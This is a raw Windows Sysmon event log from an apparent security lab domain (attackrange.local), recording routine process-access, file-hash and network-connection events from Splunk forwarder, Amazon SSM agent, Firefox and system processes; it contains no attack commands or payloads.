08:03:39.172{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108233Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.172{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000083798Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:37.699{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50191-false10.0.1.12-8000- 23542300x800000000000000083800Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:40.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=766141F7540AE78924768C13EB14B76A,SHA256=A226D6BD48C255423B6BDF1674E035EA9DF0D115CE76A859AF1C34A6B710EB07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108275Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:40.627{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-035MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108274Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:40.175{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B298A74B58836FAB53E4FDC152AAC36C,SHA256=AA452FF5C0F146507BB22884380CBAB38F5FE2CA7324F8D6CED21762965BF60C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083801Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:41.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F97F12E5D1CB1DF0D30860A3141908B,SHA256=031A996256E86FDE3BC42851895F30CAC4AEB4733CA28285F5DF53B0D5B9919B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108278Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:40.438{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51952-false10.0.1.12-8000- 23542300x8000000000000000108277Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:41.641{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-036MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108276Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:41.274{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B78DF1332C7737780860642C5E0FC54,SHA256=88721F1F34883354088F5585FA78E3B3D23557AC54FA1B04A57F6E2108357388,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083802Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:42.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F4A89E9D1E336186C2B338D0FF47340,SHA256=E349E4C8D0328521B7DB80D583418DD83088A81EFCC00C02EB331F7E0BD4D218,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108279Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:42.276{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=067CA25FE6BB6C8E957DE32BBBA9DA76,SHA256=F28351ACF1A31BAD1E94F7E8768273707E6DAAE86CCCC80C32530C0B97F89388,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083803Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:43.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4ACA949354218AA8FA18D938A51EE311,SHA256=02E43146E99546A11A77B50E1EE0E3DDE5C7D71BF89BDDBD472B51C87E8913F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108280Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:43.292{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A75833CB3C415FFECE3C6F5F257A262,SHA256=93F8E214F935C77B3DC1BE500F714CB1583BE825A09EC5C8CDE20B0D5D8A0760,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108283Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:44.307{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2C79D7A3F7ADCE3D22C2F4F44ED926D,SHA256=38B9202BA92833E34F0BE720132F5C9ACD0A5B9D059ADDCF62941D9B72CB58F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083804Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:44.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43DE94D049AA1A87F223C16A8E62D37F,SHA256=876B170B6FA6F50AD8A6F42971F4A6C0072E96644376EB8782E5D8F0F41B25F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108282Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:44.023{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=E4C8A756722DF2BAE43EB7645DDC0B1A,SHA256=073BCDB6DE2875E813FED9197F6D79F53812C67CB4061B83325227D18599E9E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108281Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:44.023{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083806Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:42.746{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50192-false10.0.1.12-8000- 23542300x800000000000000083805Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:45.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9068940AD2631C4CA9F8D332717795EB,SHA256=9D5895F65491D9875BEBAC6026CA595C9BB9B16D6497001609F7153BFD8B92D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108284Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:45.322{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21037F6ABB01CB1781FA108BECA3EEB8,SHA256=D4EB9328D795C4C4E36B6BCAB0C52D079D807B0D533240A265BBEFA1E6C2E76A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083807Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:46.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F36105C1E1E6C89461FF341F4F34EF46,SHA256=18D741AFCCD10C15DA8710BCCF6EE7C930BE6BA631DB64811F1EB47C367A7077,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108285Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:46.337{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C957003C5999EEDEA7BAEF2288C2C6F,SHA256=24B42C5BA0451805D8EF2D7EF7CEBCDC643A9E31E2FABEA50325AC7DBB60984F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083808Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:47.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23A7D4831F8F8B8C2D5A5807155B73C0,SHA256=9EC67D1A2639401AD524F2B3B576EE9C0C2E918E787CE932465F345ACE980D8D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108287Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:46.451{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51953-false10.0.1.12-8000- 23542300x8000000000000000108286Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:47.390{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=773DEFAACBE3D6CD865979D25699867F,SHA256=C9322F6F0D0A951B490622A5068714DCC87B981D5904854AD69B69E5A86C8D5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108288Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:48.404{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05060B4F9951A80469375E74BE610C9D,SHA256=0BA31382641D81BED179A4CDD21598E22AC2D6B7CFF0C2739437BEFE5074F181,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083809Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:48.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C46D6AF4C4B53FD3B9F91E76D4FBE8CA,SHA256=C580D985008BCB2394170F762415C0C23229C1EC6E7443C9101CC13A10BF607E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108289Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:49.419{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4ADA302F67522D538E7ED39A76A4B43A,SHA256=D3B6D53BCB7852D9F9D051490DED57EF2C29E9206C568FCBE7E2A93F158A2138,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083810Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:49.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=789A74BF5BDC62CAFB3605D57834E2DA,SHA256=6558F93A6EF72D384D70DFB669BDA1C216E93301BA7EF6D3CB0605C430E62E24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083811Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:50.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94BA53EC6650A427074A5724C4A437BD,SHA256=9B993CDF3B357A044D77B9B67E8BF96EF75C5CE98B487910AA15BAC42A05B997,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108290Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:50.434{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE01823D7DB161AB08C3821B549CADA2,SHA256=119BCF2DDF5303E7EA6E7CB6407F56AE901D0751C4FAFDD16379CCDE21A6C11B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108291Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:51.434{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F295226F30D4726B00D0D86E1937D7AC,SHA256=9A5099B192A81E5FBD0DF6F1D59FFAD59B6E944AE57F5841A86FE8D8386C4C69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083813Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:51.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FF86E7FD6197B44ACC8E9EE62B4F918,SHA256=5ECF2C2CA3761CAC63DB08AE76B6A70C5E13DBD8F4BFC9223A2D5961D39C9688,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083812Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:48.700{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50193-false10.0.1.12-8000- 23542300x800000000000000083814Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:52.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E30D546AF5DF9ED9B53AB1E80C504DF,SHA256=8E672EF054E7D370781B8E7C413BCBEFBF2DFF23E2C68ACA2F0EE76E5977D604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108292Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:52.450{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=755E9E6B9E3B9173E6E54AE447CCD227,SHA256=6D13EFDC51CD476B255B23646E33EAF9DFFB057A7AEC8519E8B6811DFDE55B79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083815Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:53.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13B23667E90F0EA1029BD79876B983FB,SHA256=8F697F47ADC80FB8743704C6F0C0EF5AF7F37C911607CE89F6DFDB21886900B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108293Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:53.468{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF76615EE897304500D8A4F3A4AB0CC5,SHA256=91C06B777AB7AC73DAB0D8D4286671924AA9F123A9516655630F59B034623799,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083816Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:54.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0ECCE6AFC9C2B2ED7B0749EF24E1B8B,SHA256=582587C733D47EFCF20183EF25E581C8414AE93B5F2FAD01C644B9206312C952,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108295Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:54.501{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C071859F8049BA4B12224A005A3AD69,SHA256=099AA7D31ECC51391D046E62B12A0CC2EE44F9381E9CE7E273687BD11B451833,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108294Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:52.463{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51954-false10.0.1.12-8000- 23542300x800000000000000083817Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:55.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D583C450820626240DCF55C4AA6F0413,SHA256=A0BC3CAA3CFFDD3063450EF0D7AFBC64203952E68F419EF2EB07FA92EB188342,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108296Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:55.516{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64DC7BB5B752C38D1504C9E77156D7D8,SHA256=367245D59223731EAAF272F267C7316DA498A17396B0483A68D119156B221B41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083818Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:56.581{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C62CE0B82297CF1FA88C4A61302312AE,SHA256=B7B9E7AC0C38AA40A902215F6D55498EFF3C1BBF96F417A7FC1891BF17D2E242,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108297Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:56.531{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D01EA114D2089C108B4203059B31C89C,SHA256=755CE974A75B3F8111E6E7659A7577E976D6ABD2C16049ED3F0F51CBDF6A3CA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083820Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:57.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5978864AE9012AADC5C74F4D870CF690,SHA256=5979DC83573C7B2FA2838071F59849F0FA276417505425223817851CB40A4275,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108299Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:57.545{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CFD949C2814BE5BEBF6E8E41B06E333,SHA256=2E2E3F36CE7A831903993742748EBE5466C5ED5BCA39F62B69E3986415C9D7C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083819Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:54.668{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50194-false10.0.1.12-8000- 23542300x8000000000000000108298Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:57.083{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083834Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:58.878{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B56E-615A-A301-00000000FD01}356C:\Program 